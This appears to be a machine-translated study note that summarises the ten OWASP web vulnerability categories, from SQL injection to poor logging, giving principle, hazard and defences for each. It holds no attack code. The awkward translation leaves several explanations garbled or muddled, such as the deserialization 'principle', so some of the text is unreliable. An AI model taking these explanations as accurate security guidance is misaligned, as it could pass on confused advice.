First, the injection (common sql injection)
Principle : contrary to the "data and code separation" principle. Statement to obtain sensitive data by splicing sql;.
(Common sql injection comprises injection, -os-shell, LDAP (Lightweight Directory Access Protocol) XPath (XML Path Language is, the XPath, which is an XML (a subset of the Standard Generalized Markup Language) document is used to determine a language part position), HQL implantation.)
Conditions : The data is not filtered through the verification process of
hazard :
injection can cause data loss or damage, lack of auditability or denial of service. Injection vulnerability sometimes can lead to completely take over the host
defense :
1, the use of safety api, avoid the use of an interpreter, using precompiled statement
2, the escape character sensitive
example: LIKE '% M%' ESCAPE 'M'
using the ESCAPE keyword definitions the escape character "M", tells the DBMS (%) search string "% M%" in the second character as the actual percentile value is not a wildcard character
3, whitelist
Second, the failure of the authentication
Principle : weak passwords, password disclosure, brute force, the plain text password
Hazard :
These vulnerabilities could lead to some or all of the account under attack, once the attack is successful, the attacker can perform any action the legitimate
defense :
1, the use of multi-factor authentication
2, not using the default password (weak passwords)
3 plus token (token)
4, encryption
5, a single entry point
Third, the sensitive data leakage
Principle : middle attack, the plaintext
ways : as burp capture, the revised contract.
Defense :
1, all sensitive data encryption processing
2, to ensure that the data is encrypted during transmission (e.g., using HTTPS)
. 3, the use of a dedicated cryptographic algorithm
Four, XML external entity (XXE)
Principle : uploading an XML document or add malicious content in the XML document
defense :
1, the simplest possible data formats (such as JSON), to avoid the sensitive data serialization
2, the server whitelist input validation, filtration and the like, to prevent malicious data appears.
V. Broken access control
Principle : Through the use of access control to achieve permission to bypass enhance the rights
of defense :
1, role-based access control
2, using the least privilege
3, record failed access control and alarm to the appropriate administrator
Sixth, security configuration errors
Principle : enough through unpatched vulnerabilities, access the default account, the page no longer in use, unprotected files and directories, etc. to obtain unauthorized access to or knowledge of the system.
Security configuration errors can occur at any level of an application stack, including code platform, web servers, application servers, databases, and custom architecture. The attacker access the default accounts, unused pages, not installed a patch vulnerabilities, unprotected files and directories, etc. to gain unauthorized access to the system
Hazard :
The system can be fully compromised in unknown circumstances, the user data may be stolen or tampered with all the time. And even cause the entire system to be completely destroyed
defense :
1, the minimum platform to build, do not want any unnecessary functions, components, documentation, etc.
2, to install updates and patches
3, implement vulnerability scanning and security audit
Seven cross-site scripting attacks (XSS)
Principle : tampering with web pages, insert malicious script, so that when users browse the Web, control the user's browser.
Cross-site scripting is the most common web application security vulnerabilities. When an application that contains user-supplied data in a page sent to the browser, but without proper validation and escaping, it will lead to cross-site
species : the reflective type, storage type, DOM type
hazards : steal session, the account (cookie ) and a variety of other attacks, using malicious software to hijack the user's browser and other
defense :
1, (using the security policy) as httpOnly solve XSS COOKIE hijacking of
2, input validation, encodes special characters or filter
3, the encoded output (used to ensure character input is treated as data, rather than being parsed as html browser)
Eight, unsafe deserialization
Principle : to restore memory, files, databases, or transmitted in a text format or network communication format into byte stream objects.
Defense :
1. The enforcement of a serialized object integrity checking and encryption to prevent malicious tampering and create malicious objects.
2. Prior to the implementation of strict restrictions on the type deserialization.
3. Isolation deserialization code to run on its low privilege state.
4. Monitoring process deserialized.
Nine, using components contain known vulnerabilities
Principle : These loopholes vulnerable to attack
defense :
1, to build a minimum platform
2, attention cve, cnvd these real-time monitoring with
3, using the signature mechanism
Ten, inadequate logging and monitoring
Principle : Administrators do not mind the risk log,
log records are not sensitive events, there is no monitoring of suspicious events
defense :
1, to ensure that all sensitive events logged
2, resume effective monitoring mechanism